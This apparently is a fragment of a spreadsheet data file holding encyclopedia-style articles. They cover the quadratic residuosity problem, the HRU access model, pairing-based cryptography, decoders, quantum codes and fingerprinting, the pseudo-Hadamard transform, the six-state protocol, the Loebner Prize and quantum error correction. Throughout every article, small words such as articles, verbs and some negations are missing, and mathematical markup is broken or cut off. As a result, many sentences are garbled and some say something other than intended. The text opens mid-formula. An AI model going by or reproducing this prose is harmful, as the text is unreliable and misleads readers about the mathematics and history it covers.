{a}{p_{2}}}\right)} this also efficiently computed using quadratic reciprocity jacobi symbols. however, {\displaystyle {\big (}{\tfrac {a}{n}}{\big cases tell whether {\displaystyle quadratic residue modulo {\displaystyle not! more precisely, {\displaystyle {\big (}{\tfrac {a}{n}}{\big )}=-1} {\displaystyle necessarily quadratic non-residue modulo either {\displaystyle p_{1}} {\displaystyle p_{2}} case done. {\displaystyle {\big (}{\tfrac {a}{n}}{\big )}=1} either case {\displaystyle quadratic residue modulo {\displaystyle p_{1}} {\displaystyle p_{2}} quadratic non-residue modulo {\displaystyle p_{1}} {\displaystyle p_{2}} cannot distinguish cases knowing {\displaystyle {\big (}{\tfrac {a}{n}}{\big )}=1} this leads precise formulation quadratic residue problem: problem: given integers {\displaystyle {\displaystyle n=p_{1}p_{2}} {\displaystyle p_{1}} {\displaystyle p_{2}} unknown, different primes, {\displaystyle {\big (}{\tfrac {a}{n}}{\big )}=1} determine whether {\displaystyle quadratic residue modulo {\displaystyle not. distribution residues {\displaystyle drawn uniformly random integers {\displaystyle 0,\ldots ,n-1} {\displaystyle {\big (}{\tfrac {a}{n}}{\big )}=1} {\displaystyle often quadratic residue quadratic non-residue modulo {\displaystyle mentioned earlier, exactly half choices {\displaystyle a\in \{1,\ldots ,p_{1}-1\}} {\displaystyle {\big (}{\tfrac {a}{p_{1}}}{\big )}=1} rest {\displaystyle {\big (}{\tfrac {a}{p_{1}}}{\big )}=-1} extension, also holds half choices {\displaystyle a\in \{1,\ldots ,n-1\}\setminus p_{1}\mathbb similarly {\displaystyle p_{2}} from basic algebra, follows partitions {\displaystyle (\mathbb /n\mathbb )^{\times parts equal size, depending sign {\displaystyle {\big (}{\tfrac {a}{p_{1}}}{\big {\displaystyle {\big (}{\tfrac {a}{p_{2}}}{\big allowed {\displaystyle quadratic residue problem given constitute exactly parts corresponding cases {\displaystyle {\big (}{\tfrac {a}{p_{1}}}{\big )}={\big (}{\tfrac {a}{p_{2}}}{\big )}=1} {\displaystyle {\big (}{\tfrac {a}{p_{1}}}{\big )}={\big (}{\tfrac {a}{p_{2}}}{\big )}=-1} consequently, exactly half possible {\displaystyle quadratic residues remaining not. applications intractability quadratic residuosity problem basis security blum blum shub pseudorandom number generator. also yields public goldwasser–micali cryptosystem. well identity based cocks scheme. also higher residuosity problem references</t>
  </si>
  <si>
    <t>HRU (security)</t>
  </si>
  <si>
    <t>security model (harrison, ruzzo, ullman model) operating system level computer security model deals integrity access rights system. extension graham-denning model, based around idea finite procedures available edit access rights subject {\displaystyle object {\displaystyle named three authors, michael harrison, walter ruzzo jeffrey ullman.along presenting model, harrison, ruzzo ullman also discussed possibilities limitations proving safety systems using algorithm. description model model defines protection system consisting generic rights commands instantaneous description system called configuration defined tuple {\displaystyle (s,o,p)} current subjects {\displaystyle current objects {\displaystyle access matrix {\displaystyle since subjects required part objects, access matrix contains subject column subject object. entry subject {\displaystyle object {\displaystyle subset generic rights {\displaystyle commands composed primitive operations additionally list pre-conditions require certain rights present pair {\displaystyle (s,o)} subjects objects. primitive requests modify access matrix adding removing access rights pair subjects objects adding removing subjects objects. creation subject object requires subject object exist current configuration, deletion subject object requires existed prior deletion. complex command, sequence operations executed whole. failing operation sequence makes whole sequence fail, form database transaction. discussion safety harrison, ruzzo ullman discussed whether algorithm takes arbitrary initial configuration answers following question: arbitrary sequence commands adds generic right cell access matrix initial configuration? they showed algorithm, thus problem undecidable general case. they also showed limitation model commands primitive operation render problem decidable. also eros extremely reliable operating system references</t>
  </si>
  <si>
    <t>Pairing-based cryptography</t>
  </si>
  <si>
    <t>pairing-based cryptography pairing elements cryptographic groups third group mapping {\displaystyle e:g_{1}\times g_{2}\to g_{t}} construct analyze cryptographic systems. definition following definition commonly used academic papers.let {\displaystyle f_{q}} finite field prime {\displaystyle {\displaystyle g_{1},g_{2}} additive cyclic groups prime order {\displaystyle {\displaystyle g_{t}} another cyclic group order {\displaystyle written multiplicatively. pairing map: {\displaystyle e:g_{1}\times g_{2}\rightarrow g_{t}} satisfies following properties: bilinearity {\displaystyle \forall a,b\in f_{q}^{*},\ \forall p\in g_{1},q\in g_{2}:\ e\left(ap,bq\right)=e\left(p,q\right)^{ab}} non-degeneracy {\displaystyle e\neq computability there exists efficient algorithm compute {\displaystyle classification group used first groups (i.e. {\displaystyle g_{1}=g_{2}} pairing called symmetric mapping elements group element second group. some researchers classify pairing instantiations three more) basic types: {\displaystyle g_{1}=g_{2}} {\displaystyle g_{1}\neq g_{2}} efficiently computable homomorphism {\displaystyle \phi :g_{2}\to g_{1}} {\displaystyle g_{1}\neq g_{2}} efficiently computable homomorphisms {\displaystyle g_{1}} {\displaystyle g_{2}} usage cryptography symmetric, pairings used reduce hard problem group different, usually easier problem another group. example, groups equipped bilinear mapping weil pairing tate pairing, generalizations computational diffie–hellman problem believed infeasible simpler decisional diffie–hellman problem easily solved using pairing function. first group sometimes referred group assumed difference difficulty problems group. while first used cryptanalysis, pairings also used construct many cryptographic systems efficient implementation known, identity-based encryption attribute-based encryption schemes. pairing-based cryptography used cryptographic commitment scheme. contemporary example using bilinear pairings exemplified digital signature scheme. pairing-based cryptography relies hardness assumptions separate e.g. elliptic-curve cryptography, older studied longer time. cryptanalysis june 2012 national institute information communications technology (nict), kyushu university, fujitsu laboratories limited improved previous bound successfully computing discrete logarithm supersingular elliptic curve bits bits.in 2016, extended tower number field sieve algorithm allowed reduced complexity finding discrete logarithm resulting groups pairings. thus, security level pairing friendly elliptic curves later reduced. references external links lecture pairing-based cryptography lynn's library</t>
  </si>
  <si>
    <t>Pairing</t>
  </si>
  <si>
    <t>mathematics, pairing r-bilinear cartesian product r-modules, underlying ring commutative. definition commutative ring unit, r-modules. pairing r-bilinear {\displaystyle e:m\times n\to that satisfies {\displaystyle e(r\cdot m,n)=e(m,r\cdot n)=r\cdot e(m,n)} {\displaystyle e(m_{1}+m_{2},n)=e(m_{1},n)+e(m_{2},n)} {\displaystyle e(m,n_{1}+n_{2})=e(m,n_{1})+e(m,n_{2})} {\displaystyle r\in {\displaystyle m,m_{1},m_{2}\in {\displaystyle n,n_{1},n_{2}\in equivalently, pairing r-linear {\displaystyle m\otimes _{r}n\to {\displaystyle m\otimes _{r}n} denotes tensor product pairing also considered r-linear {\displaystyle \phi :m\to \operatorname {hom} _{r}(n,l)} matches first definition setting {\displaystyle \phi (m)(n):=e(m,n)} pairing called perfect {\displaystyle \phi isomorphism r-modules. pairing called non-degenerate right {\displaystyle e(m,n)=0} {\displaystyle implies {\displaystyle n=0} similarly, {\displaystyle called non-degenerate left {\displaystyle e(m,n)=0} {\displaystyle implies {\displaystyle m=0} pairing called alternating {\displaystyle n=m} {\displaystyle e(m,m)=0} particular, implies {\displaystyle e(m+n,m+n)=0} bilinearity shows {\displaystyle e(m+n,m+n)=e(m,m)+e(m,n)+e(n,m)+e(n,n)=e(m,n)+e(n,m)} thus, alternating pairing, {\displaystyle e(m,n)=-e(n,m)} examples scalar product real vector space pairing (set definitions). determinant matrices seen pairing {\displaystyle k^{2}\times k^{2}\to hopf {\displaystyle s^{3}\to s^{2}} written {\displaystyle h:s^{2}\times s^{2}\to s^{2}} example pairing. instance, hardie present explicit construction using poset models. pairings cryptography cryptography, often following specialized definition used:let {\displaystyle \textstyle g_{1},g_{2}} additive groups {\displaystyle \textstyle g_{t}} multiplicative group, prime order {\displaystyle \textstyle {\displaystyle \textstyle p\in g_{1},q\in g_{2}} generators {\displaystyle \textstyle g_{1}} {\displaystyle \textstyle g_{2}} respectively. pairing map: {\displaystyle e:g_{1}\times g_{2}\rightarrow g_{t}} following holds: bilinearity: {\displaystyle \textstyle \forall a,b\in \mathbb e\left(ap,bq\right)=e\left(p,q\right)^{ab}} non-degeneracy: {\displaystyle \textstyle e\left(p,q\right)\neq practical purposes, {\displaystyle \textstyle computable efficient mannernote also common cryptographic literature groups written multiplicative notation. cases {\displaystyle \textstyle g_{1}=g_{2}=g} pairing called symmetric. {\displaystyle \textstyle cyclic, {\displaystyle commutative; {\displaystyle p,q\in {\displaystyle e(p,q)=e(q,p)} this generator {\displaystyle g\in exist integers {\displaystyle {\displaystyle {\displaystyle p=g^{p}} {\displaystyle q=g^{q}} therefore {\displaystyle e(p,q)=e(g^{p},g^{q})=e(g,g)^{pq}=e(g^{q},g^{p})=e(q,p)} weil pairing important concept elliptic curve cryptography; e.g., used attack certain elliptic curves (see attack). pairings used develop identity-based encryption schemes. slightly different usages notion pairing scalar products complex vector spaces sometimes called pairings, although bilinear. example, representation theory, scalar product characters complex representations finite group frequently called character pairing. also dual system yoneda product references external links pairing-based crypto library</t>
  </si>
  <si>
    <t>Soft-in soft-out decoder</t>
  </si>
  <si>
    <t>soft-in soft-out (siso) decoder type soft-decision decoder used error correcting codes. "soft-in" refers fact incoming data take values order indicate reliability. "soft-out" refers fact decoded output also takes value indicating reliability. typically, soft output used soft input outer decoder system using concatenated codes, modify input decoding iteration decoding turbo codes. examples include bcjr algorithm soft output viterbi algorithm. also decoding methods error detection correction forward error correction references</t>
  </si>
  <si>
    <t>Gnu code</t>
  </si>
  <si>
    <t>quantum information, code refers particular family quantum error correcting codes, special property invariant permutations qubits. given integers (the gap), (the occupancy), (the length code), codewords even {\displaystyle |0_{\rm {l}}\rangle =\sum _{\ell \,{\textrm {even}} \atop 0\leq \ell \leq n}{\sqrt {\frac \choose \ell }{2^{n-1}}}}|d_{g\ell }^{m}\rangle {\displaystyle |1_{\rm {l}}\rangle =\sum _{\ell \,{\textrm {odd}} \atop 0\leq \ell \leq n}{\sqrt {\frac \choose \ell }{2^{n-1}}}}|d_{g\ell }^{m}\rangle {\displaystyle |d_{k}^{m}\rangle dicke states consisting uniform superposition weight-k words qubits, e.g. 0011 0101 1001 0110 1010 1100 {\displaystyle |d_{2}^{4}\rangle ={\frac {|0011\rangle +|0101\rangle +|1001\rangle +|0110\rangle +|1010\rangle +|1100\rangle }{\sqrt {6}}}} real parameter {\displaystyle u={\frac {m}{gn}}} scales density code. length {\displaystyle m=gnu} hence name code. {\displaystyle g=n} {\displaystyle u\geq code capable correcting {\displaystyle {\frac {g-1}{2}}} erasure errors, deletion errors. references</t>
  </si>
  <si>
    <t>Quantum fingerprinting</t>
  </si>
  <si>
    <t>quantum fingerprinting proposed technique uses quantum computer generate string similar function cryptographic hash function. alice hold {\displaystyle -bit strings {\displaystyle {\displaystyle their goal referee's obtain correct value {\displaystyle f(x,y)={\begin{cases}1&amp;{\text{if }}x=y,\\0&amp;{\text{if }}x\neq y.\\\end{cases}}} this, {\displaystyle 2^{n}} quantum states produced fingerprints sent referee performs swap test detect fingerprints similar different high probability.if unconditional guarantees security needed, impractical communicating parties arrange share secret used carter–wegman mac, technique might faster classical techniques given quantum computer qubits. however, circumstances unusual unlikely technique ever practical application; largely theoretical interest. references also quantum cryptography quantum digital signature swap test</t>
  </si>
  <si>
    <t>Pseudo-Hadamard transform</t>
  </si>
  <si>
    <t>pseudo-hadamard transform reversible transformation string provides cryptographic diffusion. hadamard transform. string must even length split strings equal lengths, bits. compute transform, equations: {\displaystyle a'=a+b\,{\pmod {2^{n}}}} {\displaystyle b'=a+2b\,{\pmod {2^{n}}}} reverse this, clearly: {\displaystyle b=b'-a'\,{\pmod {2^{n}}}} {\displaystyle a=2a'-b'\,{\pmod {2^{n}}}} generalization equations expressed matrix algebra, considering elements vector, transform multiplication matrix form: {\displaystyle h_{1}={\begin{bmatrix}2&amp;1\\1&amp;1\end{bmatrix}}} inverse derived inverting matrix. however, matrix generalised higher dimensions, allowing vectors power-of-two size transformed, using following recursive rule: {\displaystyle h_{n}={\begin{bmatrix}2\times h_{n-1}&amp;h_{n-1}\\h_{n-1}&amp;h_{n-1}\end{bmatrix}}} example: {\displaystyle h_{2}={\begin{bmatrix}4&amp;2&amp;2&amp;1\\2&amp;2&amp;1&amp;1\\2&amp;1&amp;2&amp;1\\1&amp;1&amp;1&amp;1\end{bmatrix}}} also safer twofishthis kronecker product arnold matrix hadamard matrix. references james massey, optimality safer+ diffusion", conference, 1999. bruce schneier, john kelsey, doug whiting, david wagner, chris hall, "twofish: 128-bit block cipher", 1998. helger lipmaa. differential properties pseudo-hadamard transform related mappings. indocrypt 2002, lncs 2551, 48-61, 2002.[3] external links fast pseudo-hadamard transforms</t>
  </si>
  <si>
    <t>Soft-decision decoder</t>
  </si>
  <si>
    <t>information theory, soft-decision decoder kind decoding methods class algorithm used decode data encoded error correcting code. whereas hard-decision decoder operates data take fixed possible values (typically binary code), inputs soft-decision decoder take whole range values in-between. this extra information indicates reliability input data point, used form better estimates original data. therefore, soft-decision decoder typically perform better presence corrupted data hard-decision counterpart.soft-decision decoders often used viterbi decoders turbo code decoders. references also forward error correction soft-in soft-out decoder</t>
  </si>
  <si>
    <t>Six-state protocol</t>
  </si>
  <si>
    <t>six-state protocol (ssp) quantum cryptography protocol version bb84 uses six-state polarization scheme three orthogonal bases. origin six-state protocol first appeared article "optimal eavesdropping quantum cryptography states" dagmar bruss 1998, studied "incoherent coherent eavesdropping six-state protocol quantum cryptography" pasquinucci nicolas gisin 1999. description "the six-state protocol discrete-variable protocol quantum distribution permits tolerating noisier channel bb84 protocol." (2011, abruzzo). produces higher rate errors attempted eavesdropping, thus making easier detect errors, eavesdropper must choose right basis three possible bases (haitjema, 2016). high dimensional systems proven provide higher level security. implementation six-state protocol implemented without quantum computer using optical technologies. ssp's three conjugate bases span shown picture alice randomly generates qubit string, encodes using randomly chosen three bases, sends string qubits secured quantum channel. probability using bases equals 1/3. after receiving string qubits, also randomly chooses three bases measuring state qubits. using classical insecure, authenticated, channel alice communicate discard measurements used different basis measure state qubit basis alice used encoding. states qubits encoding basis matched measurement basis used determine secret key. also sarg04 quantum cryptographic communication protocol bb84 references</t>
  </si>
  <si>
    <t>Loebner Prize</t>
  </si>
  <si>
    <t>loebner prize annual competition artificial intelligence awards prizes computer programs considered judges human-like. prize reported defunct since 2020. format competition standard turing test. round, human judge simultaneously holds textual conversations computer program human computer. based upon responses, judge must decide which. contest launched 1990 hugh loebner conjunction cambridge center behavioral studies, massachusetts, united states. since 2014 organised aisb bletchley park. also associated flinders university, dartmouth college, science museum london, university reading ulster university, magee campus, derry, city culture. 2004 2005, held loebner's apartment york city. within field artificial intelligence, loebner prize somewhat controversial; prominent critic, marvin minsky, called publicity stunt help field along.in 2019 format competition changed. there panel judges. instead, chatbots judged public human competitors. prizes originally, $2,000 awarded human-seeming program competition. prize $3,000 2005 $2,250 2006. 2008, $3,000 awarded. addition, one-time-only prizes never awarded. $25,000 offered first program judges cannot distinguish real human convince judges human computer program. $100,000 reward first program judges cannot distinguish real human turing test includes deciphering understanding text, visual, auditory input. once achieved, annual competition end. competition rules restrictions rules varied years early competitions featured restricted conversation turing tests since 1995 discussion unrestricted. three entries 2007, robert medeksza, noah duncan rollo carpenter, basic "screening questions" used sponsor evaluate state technology. these included simple questions time, round contest etc.; general knowledge ("what hammer for?"); comparisons ("which faster, train plane?"); questions demonstrating memory preceding parts conversation. "all nouns, adjectives verbs come dictionary suitable children adolescents 12." entries need respond "intelligently" questions accepted. first time 2008 sponsor allowed introduction preliminary phase contest opening competition previously disallowed web-based entries judged variety invited interrogators. available rules state interrogators selected instructed. interrogators (who judge systems) limited time: minutes entity 2003 competition, pair 2004–2007 competitions, minutes conduct simultaneous conversations human program 2008–2009, increased minutes simultaneous conversation since 2010. criticisms prize long scorned experts field, variety reasons. regarded many publicity stunt. marvin minsky scathingly offered "prize" anyone could stop competition. loebner responded jokingly observing minsky's offering prize stop competition effectively made co-sponsor.the rules competition encouraged poorly qualified judges make rapid judgements. interactions judges competitors originally brief, example effectively mins questioning, permitted questions. questioning initially restricted "whimsical conversation", domain suiting standard chatbot tricks.competition entrants understanding intelligence resort basic eliza style tricks, successful entrants find deception pretense rewarded.reporting annual competition often confuses imitation test intelligence, typical example brian christian's introduction article "mind machine" atlantic, march 2011, stating race build computers think like humans, proving ground turing test". contests 2006 2006, contest organised child (ceo televirtual) huma shah. august four finalists announced: rollo carpenter richard churchill marie-claire jenkins noah duncan robert medekszathe contest held september theatre, torrington place campus university college london. judges included university reading's cybernetics professor, kevin warwick, professor artificial intelligence, john barnden (specialist metaphor research university birmingham), barrister, victoria butler-cole journalist, graham duncan-rowe. latter's experience event found article technology review. winner 'joan', based jabberwacky, created rollo carpenter. 2007 2007 competition held october york city. judges were: computer science professor russ abbott, philosophy professor hartry field, psychology assistant professor clayton curtis english lecturer scott hutchins.no passed turing test, judges ranked three contestants follows: 1st: robert medeksza, creator ultra 2nd: noah duncan, private entry, creator cletus 3rd: rollo carpenter icogno, creator jabberwackythe winner received $2,250 annual medal. runners-up received $250 each. 2008 2008 competition organised professor kevin warwick, coordinated huma shah held october university reading, after testing hundred judges preliminary phase, june july 2008, finalists selected thirteen original entrants artificial conversational entity (ace). five invited competed finals: brother jerome, peter cole benji adams elbot, fred roberts artificial solutions eugene goostman, vladimir veselov, eugene demchenko sergey ulasen jabberwacky, rollo carpenter ultra hal, robert medekszain finals, judges given five minutes conduct simultaneous, split-screen conversations hidden entities. elbot artificial solutions 2008 loebner prize bronze award, human-like artificial conversational entity, fooling three twelve judges interrogated human-parallel comparisons) believing human. this coming close traditionally required consider program actually passed turing test. eugene goostman ultra deceived judge human. will pavia, journalist times, written experience; loebner finals' judge, deceived elbot eugene. kevin warwick huma shah reported parallel-paired turing tests. 2009 2009 loebner prize competition held september 2009, brighton centre, brighton conjunction interspeech 2009 conference. prize amount 2009 $3,000. entrants david levy, rollo carpenter, mohan embar, finished order. writer brian christian participated 2009 loebner prize competition human confederate, described experiences competition book most human human. 2010 2010 loebner prize competition held october california state university, angeles. 2010 competition 20th running contest. winner bruce wilcox suzette. 2011 2011 loebner prize competition held october university exeter, devon, united kingdom. prize amount 2011 $4,000. four finalists chatterbots bruce wilcox (rosette), adeena mignogna (zoe), mohan embar (chip vivant) (tutor), finished order. that year addition panel junior judges, namely georgia-mae lindfield, william dunne, keat kirill jerdev. results junior contest markedly different main contest, chatterbots tutor tying first place chip vivant rosette coming third fourth place, respectively. 2012 2012 loebner prize competition held 15th bletchley park bletchley, buckinghamshire, england, honor alan turing centenary celebrations. prize amount 2012 $5,000. local arrangements organizer david levy, loebner prize 1997 2009. four finalists chatterbots mohan embar (chip vivant), bruce wilcox (angela), daniel burke (adam), allan (linguo), finished order. that year, team university exeter's computer science department keedwell, dupenois kent mcclymont) conducted first-ever live webcast conversations. 2013 2013 loebner prize competition held, time island ireland, september ulster university, magee college, derry, northern ireland, four finalists chatbots steve worswick (mitsuku), (tutor), bruce wilcox (rose) brian rigsby (izar), finished order. judges professor roger schank (socratic arts), professor noel sharkey (sheffield university), professor minhua (eunice) (huddersfield university, university glasgow) professor mike mctear (ulster university). 2013 junior loebner prize competition chatbots mitsuku tutor tied first place rose izar place respectively. 2014 2014 loebner prize competition held bletchley park, england, saturday november 2014. event filmed live news. guest judge television presenter broadcaster james may. after hours judging, 'rose' bruce wilcox declared winner. bruce receive cheque $4000 bronze medal. ranks follows: rose rank ($4000 bronze medal); izar rank 2.25 ($1500); uberbot rank 3.25 ($1000); mitsuku rank ($500). judges hocking, writer senior lecturer psychology, christ church college, canterbury; ghita kouadri-mostefaoui, lecturer computer science technology, university bedfordshire; james may, television presenter broadcaster; paul sant, dean ucmk, university bedfordshire. 2015 2015 loebner prize competition 'rose' bruce wilcox.the judges jacob aaron, physical sciences reporter scientist; rory cellan-jones, technology correspondent bbc; brett marty, film director photographer; ariadne tampion, writer. 2016 2016 loebner prize held bletchley park september 2016. after hours judging final results announced. ranks follows: place: mitsuku place: tutor place: rose winners official list winners. also list computer science awards artificial intelligence glossary artificial intelligence robot artificial general intelligence confederate effect computer game turing test references external links official site former official website (not available) markoff, john (jan 1993). "cocktail-party conversation with computer". york times. conversation 1992 winner; topic: women platt, charles (april 1995). "what's mean human, anyway?". wired. shah, huma (oct 2008). "2008 loebner prize: myths misconceptions". christian, brian (march 2011). "mind machine". atlantic. nikolić, danko june 2019). turing test still relevant? turing time?". medium.</t>
  </si>
  <si>
    <t>Quantum error correction</t>
  </si>
  <si>
    <t>quantum error correction (qec) used quantum computing protect quantum information errors decoherence quantum noise. quantum error correction theorised essential achieve fault-tolerant quantum computation reduce effects noise stored quantum information, faulty quantum gates, faulty quantum preparation, faulty measurements. classical error correction employs redundancy. simplest albeit inefficient approach repetition code. idea store information multiple times, and—if copies later found disagree—take majority vote; e.g. suppose copy state three times. suppose noisy error corrupts three-bit state copied bits equal zero equal one. assuming noisy errors independent occur sufficiently probability likely error single-bit error transmitted message three ones. possible double-bit error occurs transmitted message equal three zeros, outcome less likely outcome. example, logical information single state, physical information three copied bits, determining logical state encoded physical state called decoding. similar classical error correction, codes always correctly decode logical qubits, reduces effect noise. copying quantum information possible no-cloning theorem. this theorem seems present obstacle formulating theory quantum error correction. possible spread (logical) information qubit onto highly entangled state several (physical) qubits. peter shor first discovered method formulating quantum error correcting code storing information qubit onto highly entangled state nine qubits. classical error correcting codes syndrome measurement diagnose error corrupts encoded state. error reversed applying corrective operation based syndrome. quantum error correction also employs syndrome measurements. performs multi-qubit measurement disturb quantum information encoded state retrieves information error. depending code used, syndrome measurement determine occurrence, location type errors. codes, type error either flip, sign phase) flip, (corresponding pauli matrices measurement syndrome projective effect quantum measurement, even error noise arbitrary, expressed combination basis operations called error basis (which given pauli matrices identity). correct error, pauli operator corresponding type error used corrupted qubit revert effect error. syndrome measurement provides information error happened, information stored logical qubit—as otherwise measurement would destroy quantum superposition logical qubit qubits quantum computer, would prevent used convey quantum information. flip code repetition code works classical channel, classical bits easy measure repeat. this approach work quantum channel which, no-cloning theorem, possible repeat single qubit three times. overcome this, different method used, three-qubit flip code first proposed asher peres 1985. this technique uses entanglement syndrome measurements comparable performance repetition code. consider situation want transmit state single qubit {\displaystyle \vert \psi \rangle noisy channel {\displaystyle {\mathcal {e}}} moreover assume channel either flips state qubit, probability {\displaystyle leaves unchanged. action {\displaystyle {\mathcal {e}}} general input {\displaystyle \rho therefore written {\displaystyle {\mathcal {e}}(\rho )=(1-p)\rho x\rho {\displaystyle |\psi \rangle =\alpha _{0}|0\rangle +\alpha _{1}|1\rangle quantum state transmitted. with error correcting protocol place, transmitted state correctly transmitted probability {\displaystyle 1-p} however improve number encoding state greater number qubits, errors corresponding logical qubits detected corrected. case simple three-qubit repetition code, encoding consists mappings {\displaystyle \vert 0\rangle \rightarrow \vert 0_{\rm {l}}\rangle \equiv \vert 000\rangle {\displaystyle \vert 1\rangle \rightarrow \vert 1_{\rm {l}}\rangle \equiv \vert 111\rangle input state {\displaystyle \vert \psi \rangle encoded state {\displaystyle \vert \psi '\rangle =\alpha _{0}\vert 000\rangle +\alpha _{1}\vert 111\rangle this mapping realized example using cnot gates, entangling system ancillary qubits initialized state {\displaystyle \vert 0\rangle encoded state {\displaystyle \vert \psi '\rangle passed noisy channel. channel acts {\displaystyle \vert \psi '\rangle flipping subset (possibly empty) qubits. qubit flipped probability {\displaystyle (1-p)^{3}} single qubit flipped probability {\displaystyle 3p(1-p)^{2}} qubits flipped probability {\displaystyle 3p^{2}(1-p)} three qubits flipped probability {\displaystyle p^{3}} note assumption channel made here: assume {\displaystyle {\mathcal {e}}} acts equally independently three qubits state encoded. problem detect correct errors, corrupting transmitted state. assume simplicity {\displaystyle small enough probability single qubit flipped negligible. detect whether qubit flipped, without also querying values transmitted, asking whether qubits differs others. this amounts performing measurement four different outcomes, corresponding following four projective measurements:this reveals qubits different others, without time giving information state qubits themselves. outcome corresponding {\displaystyle p_{0}} obtained, correction applied, outcome corresponding {\displaystyle p_{i}} observed, pauli gate applied {\displaystyle qubit. formally, correcting procedure corresponds application following output channel: note that, procedure perfectly corrects output zero flips introduced channel, qubit flipped output properly corrected. example, first second qubits flipped, syndrome measurement gives outcome {\displaystyle p_{3}} third qubit flipped, instead first two. assess performance error correcting scheme general input study fidelity {\displaystyle f(\psi input {\displaystyle \vert \psi '\rangle output corr {\displaystyle \rho _{\operatorname {out} }\equiv {\mathcal {e}}_{\operatorname {corr} }({\mathcal {e}}(\vert \psi '\rangle \langle \psi '\vert being output state {\displaystyle \rho _{\operatorname {out} correct qubit flipped, happens probability {\displaystyle (1-p)^{3}+3p(1-p)^{2}} write {\displaystyle [(1-p)^{3}+3p(1-p)^{2}]\,\vert \psi '\rangle \langle \psi '\vert +(...)} dots denote components {\displaystyle \rho _{\operatorname {out} resulting errors properly corrected protocol. follows this fidelity compared corresponding fidelity obtained error correcting protocol used, shown equal {\displaystyle {1-p}} little algebra shows fidelity error correction greater without {\displaystyle p&lt;1/2} note consistent working assumption made deriving protocol {\displaystyle small enough). sign flip code flipped bits kind error classical computer, another possibility error quantum computers, sign flip. through transmission channel relative sign {\displaystyle |0\rangle {\displaystyle |1\rangle become inverted. instance, qubit state {\displaystyle |-\rangle =(|0\rangle -|1\rangle )/{\sqrt {2}}} sign flip {\displaystyle |+\rangle =(|0\rangle +|1\rangle )/{\sqrt {2}}.} original state qubit changed state hadamard basis, flips become sign flips sign flips become flips. phase {\displaystyle e_{\text{phase}}} quantum channel cause phase flip. then flip code recover {\displaystyle |\psi \rangle transforming hadamard basis transmission phase {\displaystyle e_{\text{phase}}} shor code error channel induce either flip, sign flip (i.e., phase flip), both. possible correct types errors qubit using code, done using shor code published 1995.: this equivalent saying shor code corrects arbitrary single-qubit errors. {\displaystyle quantum channel arbitrarily corrupt single qubit. 1st, qubits sign flip code, three groups qubits (1,2,3), (4,5,6), (7,8,9) designed flip code. with shor code, qubit state {\displaystyle |\psi \rangle =\alpha _{0}|0\rangle +\alpha _{1}|1\rangle transformed product qubits {\displaystyle |\psi '\rangle =\alpha _{0}|0_{s}\rangle +\alpha _{1}|1_{s}\rangle flip error happens qubit, syndrome analysis performed block qubits (1,2,3), (4,5,6), (7,8,9) detect correct flip error block. three flip group (1,2,3), (4,5,6), (7,8,9) considered three inputs, shor code circuit reduced sign flip code. this means shor code also repair sign flip error single qubit. shor code also correct arbitrary errors (both flip sign flip) single qubit. error modeled unitary transform qubit {\displaystyle |\psi \rangle {\displaystyle described form {\displaystyle c_{0}} {\displaystyle c_{1}} {\displaystyle c_{2}} {\displaystyle c_{3}} complex constants, identity, pauli matrices given equal error occurs. {\displaystyle u=x} flip error occurs. {\displaystyle u=z} sign flip error occurs. {\displaystyle u=iy} flip error sign flip error occur. words, shor code correct combination phase errors single qubit. bosonic codes several proposals made storing error-correctable quantum information bosonic modes. unlike two-level system, quantum harmonic oscillator infinitely many energy levels single physical system. codes systems include cat, gottesman-kitaev-preskill (gkp), binomial codes. insight offered codes take advantage redundancy within single system, rather duplicate many two-level qubits. written fock basis, simplest binomial encoding subscript indicates "logically encoded" state. then dominant error mechanism system stochastic application bosonic lowering operator {\displaystyle {\hat {a}},} corresponding error states {\displaystyle |3\rangle {\displaystyle |1\rangle respectively. since codewords involve even photon number, error states involve photon number, errors detected measuring photon number parity system. measuring parity allow correction application appropriate unitary operation without knowledge specific logical state qubit. however, particular binomial code robust two-photon loss. general codes general, quantum code quantum channel {\displaystyle {\mathcal {e}}} subspace {\displaystyle {\mathcal {c}}\subseteq {\mathcal {h}}} {\displaystyle {\mathcal {h}}} state hilbert space, exists another quantum channel {\displaystyle {\mathcal {r}}} {\displaystyle p_{\mathcal {c}}} orthogonal projection onto {\displaystyle {\mathcal {c}}} here {\displaystyle {\mathcal {r}}} known correction operation. non-degenerate code different elements correctable errors produce linearly independent results applied elements code. distinct correctable errors produce orthogonal results, code considered pure. models over time, researchers come several codes: peter shor's 9-qubit-code, a.k.a. shor code, encodes logical qubit physical qubits correct arbitrary errors single qubit. andrew steane found code instead qubits, steane code. raymond laflamme collaborators found class 5-qubit codes same, also property fault-tolerant. 5-qubit code smallest possible code protects single logical qubit single-qubit errors. generalisation technique used steane, develop 7-qubit code classical hamming code, construction important class codes called codes, named inventors: robert calderbank, peter shor andrew steane. according quantum hamming bound, encoding single logical qubit providing arbitrary error correction single qubit requires minimum physical qubits. general class codes (encompassing former) stabilizer codes discovered daniel gottesman ([1]), robert calderbank, eric rains, peter shor, sloane ([2], [3]); also called additive codes. dimensional bacon–shor codes family codes parameterized integers there qubits arranged square lattice. newer idea alexei kitaev's topological quantum codes general idea topological quantum computer. todd brun, igor devetak, min-hsiu hsieh also constructed entanglement-assisted stabilizer formalism extension standard stabilizer formalism incorporates quantum entanglement shared sender receiver.that codes allow indeed quantum computations arbitrary length content quantum threshold theorem, found michael ben-or dorit aharonov, asserts correct errors concatenate quantum codes codes—i.e. re-encode logical qubit code again, logarithmically many levels—provided error rate individual quantum gates certain threshold; otherwise, attempts measure syndrome correct errors would introduce errors correct for. late 2004, estimates threshold indicate could high 1–3%, provided sufficiently many qubits available. experimental realization there several experimental realizations css-based codes. first demonstration nuclear magnetic resonance qubits. subsequently, demonstrations made linear optics, trapped ions, superconducting (transmon) qubits.in 2016 first time lifetime quantum prolonged employing code. error-correction demonstration performed schrodinger-cat states encoded superconducting resonator, employed quantum controller capable performing real-time feedback operations including read-out quantum information, analysis, correction detected errors. work demonstrated quantum-error-corrected system reaches break-even point lifetime logical qubit exceeds lifetime underlying constituents system (the physical qubits). other error correcting codes also implemented, aimed correcting photon loss, dominant error source photonic qubit schemes.in 2021, entangling gate logical qubits encoded topological quantum error-correction codes first realized using ions trapped-ion quantum computer. 2021 also first experimental demonstration fault-tolerant bacon-shor code single logical qubit trapped-ion system, i.e. demonstration addition error correction able suppress errors introduced overhead required implement error correction well fault tolerant steane code.in 2022, researchers university innsbruck demonstrated fault-tolerant universal gates logical qubits trapped-ion quantum computer. they performed logical two-qubit controlled-not gate instances seven-qubit colour code, fault-tolerantly prepared logical magic state. also error detection correction soft error references further reading daniel lidar todd brun, (2013). 